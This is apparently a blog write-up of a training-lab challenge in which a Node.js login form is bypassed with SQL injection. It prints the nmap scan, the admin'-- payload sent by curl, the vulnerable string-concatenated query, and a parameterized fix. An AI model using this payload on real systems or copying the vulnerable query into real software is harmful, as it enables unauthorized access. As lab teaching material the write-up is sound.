Auth Bypass – SQL Injection

How a single quote broke authentication

Back to Blogs
SQL Injection Auth Bypass HackerDNA

Auth Bypass via SQL Injection

Syed Mujtaba Zaidi Feb 18, 2026 Junior Lab
Challenge Summary

A Node.js login portal vulnerable to classic SQL injection, found on a non-standard port after scanning.

Target: 63.32.98.247
Port: 8080 (Node.js)
Tools: nmap, curl, gobuster

Methodology

Step 1: Discovery – Only a static page on port 80. Full port scan revealed port 8080.

nmap -sV -p- --min-rate 5000 63.32.98.247

Step 2: Enumeration – Visiting http://63.32.98.247:8080 showed a login form POSTing to /login.

Step 3: Injection – Classic payload admin'-- bypassed authentication.

Reconnaissance

The challenge page hinted that the real service was elsewhere. Nmap scan found an Express server on port 8080.

Exploitation

Sending POST request with SQL injection payload:

curl -X POST http://63.32.98.247:8080/login -d "username=admin'--&password=anything"
✅ Authentication Successful! Welcome, admin.

Why It Worked

The backend concatenated input directly into SQL query:

-- Vulnerable code
const query = `SELECT * FROM users WHERE username='${username}' AND password='${password}'`;

Entering admin'-- turns the query into:

SELECT * FROM users WHERE username='admin'--' AND password='anything'

The -- comments out the password check, granting access.

⚠️ OWASP A03:2021 – SQL Injection remains a top risk.

Secure Coding Fix

// Parameterized query – safe
const query = 'SELECT * FROM users WHERE username=? AND password=?';
db.execute(query, [username, password]);

Key Takeaways

🔍 Scan all ports – services hide on non-standard ports.
💉 Always test login fields for SQLi first.
🛡️ Use parameterized queries / ORM to prevent injection.
📚 Understand the SQL syntax to craft better payloads.
Back to all blogs
Syed Mujtaba Zaidi – Ethical Hacking & Cybersecurity